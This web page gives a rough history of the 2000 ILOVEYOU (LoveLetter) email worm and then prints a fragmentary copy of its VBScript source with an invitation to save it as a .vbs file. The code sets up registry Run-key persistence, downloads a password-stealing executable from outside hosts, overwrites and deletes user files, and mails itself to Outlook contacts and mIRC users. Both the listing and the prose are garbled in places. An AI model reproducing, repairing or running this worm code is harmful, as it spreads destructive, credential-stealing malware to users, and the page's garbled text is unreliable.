I Love You Virus

I Love You Virus Definition

The computer, I Love You Virus. Known to users as the ” Love Virus, “it belongs to the worm category, capable of reproducing through electronic networks.

And also, modifying the files of the infected computer and transmitting it via email when the Internet user opens the file where he stays.


On May 4, 2000, this virus released on the network, quickly filling up the more than 3 million computers.

I Love You Virus was released in the Philippines, making Asia the first country to suffer from its destructive effects, followed by Europe and Russia.

Kung maganda ang pakiramdam, mangyaring magustuhan at ibahagi. Salamat sa lahat ng sumuporta sa amin na magkaroon ng mas mahusay na mga video😊😊Become a mem. Loveletter virus source code Below is the text of the pathetic LoveLetter 'virus', for anyone who's interested. It has been reformatted as an plain text/HTML file, so there's no need to worry about being infected by it.

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What are the Features of this Virus?

I Love You Virus Code In Notepad

The virus overwrites files with.VBS and.VBE extensions with its code. Delete the files with extensions.JS, .JSE, .CSS, .WSH, .SCT and .HTA, and create others with the same name and extension.

It locates files with the extension.JPG, .JPEG, .MP3, and .MP2, delete them, and create others where the new name is formed by the previous name.

How does this I Love You Virus work?

  • After the first start of the “love message” copies itself into the system directories and the registry of the operating system and then searches the computer for multimedia files.
  • When the virus found, it changes the data extension and sometimes makes it invisible to the user.
  • I then start a fan mailing to the recipients and download a program to steal passwords and send information to the creator’s email address.
  • However, computer viruses love letter 2000. The code has been heavily modified, and if its action previously only damaged multimedia files, everything changed over time.
  • New versions of the “love message” lead to the failure of the computer, deletion and modification of the system file INI and BAT, which are responsible for loading the machine.

What are the precautions to be taken?

I Love You Virus Download

There are still a few versions on the Internet. Viruses are fewer because Kaspersky Lab has long been developing a program that can detect any change in the “love message.”

  1. The software checks the script before it runs, and if it detects any malicious code in it, it prevents the script from starting.
  2. But already active virus I love you (the creator of this filth, Onel de Guzmán) cannot stop – it can only delete by losing the affected files.
  3. In order to avoid such consequences (users who do not consider to protect their PC), it is better not to download suspicious attachments, even if they come with a letter from a friend.
  4. It is necessary to double-check with a friend what is in them and make sure that the email was sent by someone, not by a malicious program.

Also Read: What is Kerberos? – Definition, Elements and More

Review What is I Love You Virus? – Definition, Features, and More.

May 16th, 2016
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  1. | $$_____/ | $$| $$ | $$_____/ | $$|__/ | $$
  2. | $$ /$$$$$$ | $$| $$ /$$$$$$ /$$$$$$$ | $$ /$$$$$$$ /$$ /$$$$$$
  3. | $$$$$|____ $$| $$| $$ /$$__ $$| $$__ $$ | $$$$$ /$$__ $$| $$|_ $$_/
  4. | $$__/ /$$$$$$$| $$| $$| $$$$$$$$| $$ $$ | $$__/ | $$ | $$| $$ | $$
  5. | $$ /$$__ $$| $$| $$| $$_____/| $$ | $$ | $$ | $$ | $$| $$ | $$ /$$
  6. | $$ | $$$$$$$| $$| $$| $$$$$$$| $$ | $$ | $$$$$$$$| $$$$$$$| $$ | $$$$/
  7. |__/ _______/|__/|__/ _______/|__/ |__/ |________/ _______/|__/ ___/
  8. (Copy Text beneath this lineand save it as a .vbs file.)
  9. rem barok -loveletter(vbe) <i hate go to school>
  10. rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
  11. dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
  12. ctr=0
  13. Set fso = CreateObject('Scripting.FileSystemObject')
  14. set file = fso.OpenTextFile(WScript.ScriptFullname,1)
  15. main()
  16. OnErrorResumeNext
  17. set wscr=CreateObject('WScript.Shell')
  18. rr=wscr.RegRead('HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout')
  19. wscr.RegWrite 'HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout',0,'REG_DWORD'
  20. Set dirwin = fso.GetSpecialFolder(0)
  21. Set dirtemp = fso.GetSpecialFolder(2)
  22. c.Copy(dirsystem&'MSKernel32.vbs')
  23. c.Copy(dirsystem&'LOVE-LETTER-FOR-YOU.TXT.vbs')
  24. html()
  25. listadriv()
  26. sub regruns()
  27. Dim num,downread
  28. 'HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKern el32',dirsystem&'MSKernel32.vbs'
  29. 'HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunService sWin32DLL',dirwin&'Win32DLL.vbs'
  30. downread=regget('HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerDownload Directory')
  31. downread='c:'
  32. if (fileexist(dirsystem&'WinFAT32.exe')=1) then
  33. num = Int((4 * Rnd) + 1)
  34. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart
  35. Page','http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
  36. elseif num = 2 then
  37. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart Page','http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
  38. erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe'
  39. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart
  40. Page','http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
  41. elseif num = 4 then
  42. regcreate 'HKCUSoftwareMicrosoftInternet ExplorerMainStart
  43. Page','http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
  44. GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe'
  45. endif
  46. if (fileexist(downread&'WIN-BUGSFIX.exe')=0) then regcreate
  47. 'HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunWIN-BU GSFIX',downread&'WIN-BUGSFIX.exe'
  48. regcreate 'HKEY_CURRENT_USERSoftwareMicrosoftInternet
  49. endif
  50. sub listadriv
  51. Dim d,dc,s
  52. ForEach d in dc
  53. folderlist(d.path&')
  54. Next
  55. endsub
  56. OnErrorResumeNext
  57. set f = fso.GetFolder(folderspec)
  58. foreach f1 in fc
  59. ext=lcase(ext)
  60. if (ext='vbs') or (ext='vbe') then
  61. ap.write vbscopy
  62. elseif(ext='com') or (ext='exe') or (ext='dll') or (ext='bat') or (ext='reg') or (ext='mdl') then
  63. ap.write vbscopy
  64. bname=fso.GetBaseName(f1.path)
  65. cop.copy(folderspec&'&bname&'.vbs') fso.DeleteFile(f1.path)
  66. set ap=fso.OpenTextFile(f1.path,2,true)
  67. ap.close
  68. cop.copy(f1.path&'.vbs')
  69. elseif(ext='mp3') or (ext='mp2') then
  70. mp3.write vbscopy
  71. set att=fso.GetFile(f1.path)
  72. endif
  73. if (s='mirc32.exe') or (s='mlink32.exe') or (s='mirc.ini') or (s='script.ini') or (s='mirc.hlp') then
  74. set scriptini=fso.CreateTextFile(folderspec&'script.ini') scriptini.WriteLine '[script]'
  75. scriptini.WriteLine '; Please dont edit this script... mIRC will corrupt, if mIRC will'
  76. scriptini.WriteLine ' corrupt... WINDOWS will affect and will not run correctly. thanks'
  77. scriptini.WriteLine ';Khaled Mardam-Bey'
  78. scriptini.WriteLine ';'
  79. scriptini.WriteLine 'n1= /if ( $nick $me ) { halt }' scriptini.WriteLine 'n2= /.dcc send $nick
  80. scriptini.WriteLine 'n3=}'
  81. eq=folderspec
  82. endif
  83. endsub
  84. OnErrorResumeNext
  85. set f = fso.GetFolder(folderspec)
  86. foreach f1 in sf
  87. folderlist(f1.path)
  88. endsub
  89. Set regedit = CreateObject('WScript.Shell')
  90. endsub
  91. Set regedit = CreateObject('WScript.Shell')
  92. endfunction
  93. OnErrorResumeNext
  94. if (fso.FileExists(filespec)) Then
  95. else
  96. endif
  97. endfunction
  98. OnErrorResumeNext
  99. if (fso.GetFolderExists(folderspec)) then
  100. else
  101. endif
  102. endfunction
  103. OnErrorResumeNext
  104. dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
  105. set out=WScript.CreateObject('Outlook.Application')
  106. for ctrlists=1 to mapi.AddressLists.Count
  107. x=1
  108. regv=regedit.RegRead('HKEY_CURRENT_USERSoftwareMicrosoftWAB'&a) if (regv=') then
  109. endif
  110. for ctrentries=1 to a.AddressEntries.Count
  111. regad='
  112. regad=regedit.RegRead('HKEY_CURRENT_USERSoftwareMicrosoftWAB'&malead )
  113. set male=out.CreateItem(0)
  114. male.Subject = 'ILOVEYOU'
  115. male.Body = vbcrlf&'kindly check the attached LOVELETTER coming from me.'
  116. male.Attachments.Add(dirsystem&'LOVE-LETTER-FOR-YOU.TXT.vbs') male.Send
  117. 'HKEY_CURRENT_USERSoftwareMicrosoftWAB'&malead,1,'REG_DWORD'endif
  118. next
  119. 'HKEY_CURRENT_USERSoftwareMicrosoftWAB'&a,a.AddressEntries.Count else
  120. 'HKEY_CURRENT_USERSoftwareMicrosoftWAB'&a,a.AddressEntries.Count endif
  121. Set out=Nothing
  122. endsub
  123. OnErrorResumeNext
  125. LOVELETTER@-@>'&vbcrlf& _ '<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
  126. @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>'&vbcrlf& _ '<META NAME=@-@Description@-@
  127. CONTENT=@-@simple but i think this is good...@-@>'&vbcrlf& _
  128. ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
  129. 'ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@
  130. BGCOLOR=@-@#FF9933@-@>'&vbcrlf& _
  131. '<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to
  132. '<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
  133. BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> '&vbcrlf& _
  134. '<SCRIPT language=@-@JScript@-@>'&vbcrlf& _ '<!--?-??-?'&vbcrlf& _
  135. hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}'&vbcrl f& _
  136. '<?-?SCRIPT>'&vbcrlf& _
  137. '<SCRIPT LANGUAGE=@-@VBScript@-@>'&vbcrlf& _ '<!--'&vbcrlf& _
  138. 'dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit'&vbcrlf& _ 'aw=1'&vbcrlf& _
  139. dta2='set fso=CreateObject(@-@Scripting.FileSystemObject@-@)'&vbcrlf& _
  140. 'set dirsystem=fso.GetSpecialFolder(1)'&vbcrlf& _ 'code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))'&vbcrlf& _
  141. 'code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))'&vbcrlf& _ 'code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))'&vbcrlf& _ 'set
  142. wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)'&vbcrlf& _
  143. 'wri.close'&vbcrlf& _
  144. 'if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then'&vbcrlf& _ 'if (err.number=424) then'&vbcrlf& _
  145. 'end if'&vbcrlf& _
  146. 'document.write @-@ERROR: can#-#t initialize ActiveX@-@'&vbcrlf& _ 'window.close'&vbcrlf& _
  147. 'end if'&vbcrlf& _
  148. 'Set regedit = CreateObject(@-@WScript.Shell@-@)'&vbcrlf& _
  149. @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
  150. -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@'&vbcrlf& _ '?-??-?-->'&vbcrlf& _
  151. dt1=replace(dta1,chr(35)&chr(45)&chr(35),'')
  152. dt1=replace(dt1,chr(64)&chr(45)&chr(64),'') dt4=replace(dt1,chr(63)&chr(45)&chr(63),'/')
  153. dt2=replace(dta2,chr(35)&chr(45)&chr(35),'')
  154. dt2=replace(dt2,chr(64)&chr(45)&chr(64),'') dt3=replace(dt2,chr(63)&chr(45)&chr(63),'/')
  155. set fso=CreateObject('Scripting.FileSystemObject')
  156. lines=Split(c.ReadAll,vbcrlf)
  157. for n=0 toubound(lines)
  158. lines(n)=replace(lines(n),'',chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),'',chr(93)+chr(45)+chr(93))
  159. lines(n)=replace(lines(n),',chr(37)+chr(45)+chr(37)) if (l1=n) then
  160. else
  161. lines(n)=chr(34)+lines(n)+chr(34)&'&vbcrlf& _'endif
  162. set b=fso.CreateTextFile(dirsystem+'LOVE-LETTER-FOR-YOU.HTM') b.close
  163. set d=fso.OpenTextFile(dirsystem+'LOVE-LETTER-FOR-YOU.HTM',2) d.write dt5
  164. d.write vbcrlf
  165. d.close
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